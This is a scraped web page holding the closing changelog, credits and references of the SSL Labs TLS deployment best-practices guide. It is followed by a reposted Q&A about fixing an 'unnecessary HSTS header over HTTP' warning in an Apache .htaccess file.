The following changes were made in this version:

  • Recommend replacing 1024-bit certificates straight away.
  • Recommend against supporting SSL v3.
  • Remove the recommendation to use RC4 to mitigate the BEAST attack server-side.
  • Recommend that RC4 is disabled.
  • Recommend that 3DES is disabled in the near future.
  • Warn about the CRIME attack variations (TIME and BREACH).
  • Recommend supporting forward secrecy.
  • Add discussion of ECDSA certificates.

Version 1.4 (8 December 2014)

The following changes were made in this version:

  • Discuss SHA1 deprecation and recommend migrating to the SHA2 family.
  • Recommend that SSL v3 is disabled and mention the POODLE attack.
  • Expand Section 3.1 to cover the strength of the DHE and ECDHE key exchanges.
  • Recommend OCSP Stapling as a performance-improvement measure, promoting it to Section 3.5.

Version 1.5 (8 June 2016)

The following changes were made in this version:

  • Refreshed the entire document to keep up with the times.
  • Recommended use of authenticated cipher suites.
  • Spent more time discussing key exchange strength and the Logjam attack.
  • Removed the recommendation to disable client-initiated renegotiation. Modern software does this anyway, and it might be impossible or difficult to disable it with something older. At the same time, the DoS vector isn’t particularly strong. Overall, I feel it’s better to spend available resources fixing something else.
  • Added a warning about flaky OCSP stapling implementations.
  • Added mention of subresource integrity enforcement.
  • Added mention of cookie integrity validation and encryption.
  • Added mention of HSTS preloading.
  • Recommended using CSP for better handling of third-party mixed content.
  • Mentioned FREAK, Logjam, and DROWN attacks.
  • Removed the section that discussed mitigation of various TLS attacks, which are largely obsolete by now, especially if the advice presented here is followed. Moved discussion of CRIME variants into a new section.
  • Added a brief discussion of DNSSEC and DANE to the Advanced section.

Version 1.6 (15 January 2020)

The following changes were made in this version:

  • Refreshed the entire document to keep up with the times.
  • Added details to use SAN (Subject Alternative Names) since the Common Name is deprecated by latest browsers.
  • SHA1 signature deprecation for leaf and intermediate certificate
  • Added DNS CAA information, recommened the use of it.
  • Added information about the extra download of missing intermediate certificate and the sequence of it.
  • Recommended the use of TLS 1.3
  • Recommended not to use the legacy protocol TLS v1.0 and TLS v1.1
  • Improved the secure cipher suites section with more information and newly discovered weak/insecure cipher.
  • Updated HSTS preload footnotes link.

Acknowledgments

Special thanks to Marsh Ray, Nasko Oskov, Adrian F. Dimcev, and Ryan Hurst for their valuable feedback and help in crafting the initial version of this document. Also thanks to many others who generously share their knowledge of security and cryptography with the world. The guidelines presented here draw on the work of the entire security community.

About SSL Labs

SSL Labs (www.ssllabs.com) is Qualys’s research effort to understand SSL/TLS and PKI as well as to provide tools and documentation to assist with assessment and configuration. Since 2009, when SSL Labs was launched, hundreds of thousands of assessments have been performed using the free online assessment tool. Other projects run by SSL Labs include periodic Internet-wide surveys of TLS configuration and SSL Pulse, a monthly scan of about 150,000 most popular TLS-enabled web sites in the world.

About Qualys

Qualys, Inc. (NASDAQ: QLYS) is a pioneer and leading provider of cloud-based security and compliance solutions with over 9,300 customers in more than 100 countries, including a majority of each of the Forbes Global 100 and Fortune 100. The Qualys Cloud Platform and integrated suite of solutions help organizations simplify security operations and lower the cost of compliance by delivering critical security intelligence on demand and automating the full spectrum of auditing, compliance and protection for IT systems and web applications. Founded in 1999, Qualys has established strategic partnerships with leading managed service providers and consulting organizations including Accenture, BT, Cognizant Technology Solutions, Deutsche Telekom, Fujitsu, HCL, HP Enterprise, IBM, Infosys, NTT, Optiv, SecureWorks, Tata Communications, Verizon and Wipro. The company is also a founding member of the Cloud Security Alliance (CSA). For more information, please visit www.qualys.com.

[1] Transport Layer Security (TLS) Parameters (IANA, retrieved 18 March 2016)

[2] Weak Diffie-Hellman and the Logjam Attack (retrieved 16 March 2016)

[3] Subresource Integrity (Mozilla Developer Network, retrieved 16 March 2016)

[4] Defending against the BREACH Attack (Qualys Security Labs; 7 August 2013)

[5] HSTS Preload List (Google developers, retrieved 16 March 2016)

[6] SSL Labs (retrieved 16 March 2016)

[7] RFC 7469: Public Key Pinning Extension for HTTP (Evans et al, April 2015)

[8] RFC 6844: DNS CAA (Evans et al, January 2013)

Source :
https://github.com/ssllabs/research/wiki/SSL-and-TLS-Deployment-Best-Practices

Warning: Unnecessary HSTS header over HTTP

we would like to add the HSTS header to our page https://www.wipfelglueck.de
Our page is running on a shared server, so we don’t have access to the httpd.conf. We tried to enable this header via the .htaccess file like this:

<ifmodule mod_headers.c>
  DefaultLanguage de
  Header set X-XSS-Protection "1; mode=block"
  Header set X-Frame-Options "sameorigin"
  Header set X-Content-Type-Options "nosniff"
  
  Header set X-Permitted-Cross-Domain-Policies "none"
  
  Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains; preload"
  
  Header set Referrer-Policy: no-referrer
  
  <FilesMatch "\.(js|css|xml|gz)$"> 
    Header append Vary Accept-Encoding 
  </FilesMatch> 
   
  <filesMatch ".(ico|jpg|jpeg|png|gif|webp)$">
   Header set Cache-Control "max-age=2592000, public"
  </filesMatch>
  <filesMatch ".(css|js|json|html)$">
   Header set Cache-Control "max-age=604800, public"
  </filesMatch>
</IfModule>

When we check the page we receive the warning in subject with this text:
“The HTTP page at http://wipfelglueck.de sends an HSTS header. This has no effect over HTTP, and should be removed.”

I tried some ways to solve this, but was not successful so far. In the web I can’t find a solution, so I would be happy if you could give me a hint on this!

Thank you very much!!


Thank you very much for your respond!
With the header:

Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains; preload" env=HTTPS

or

Header set Strict-Transport-Security "max-age=31536000; includeSubDomains; preload" env=HTTPS

there is no error, the page runs, but when I check the page this error is mentioned:

Error: No HSTS header
Response error: No HSTS header is present on the response.

That’s strange. What did I wrong?

Answer

You can conditionally set headers using env=

Header always set Strict-Transport-Security "..." env=HTTPS

(you can use both always and env= simultaneously, the former only filters by response status)

That being said, do not optimize for benchmarks or compliance checkmarks. This header does not do anything, caring about it just takes away attention from things that do have effects. This header simply has no effect when not sent via secured transports – but as these days, (almost) all plaintext requests should just redirect to https://, this is true for (almost) any response header in http://.

Source :
https://bootpanic.com/warning-unnecessary-hsts-header-over-http/

Exit mobile version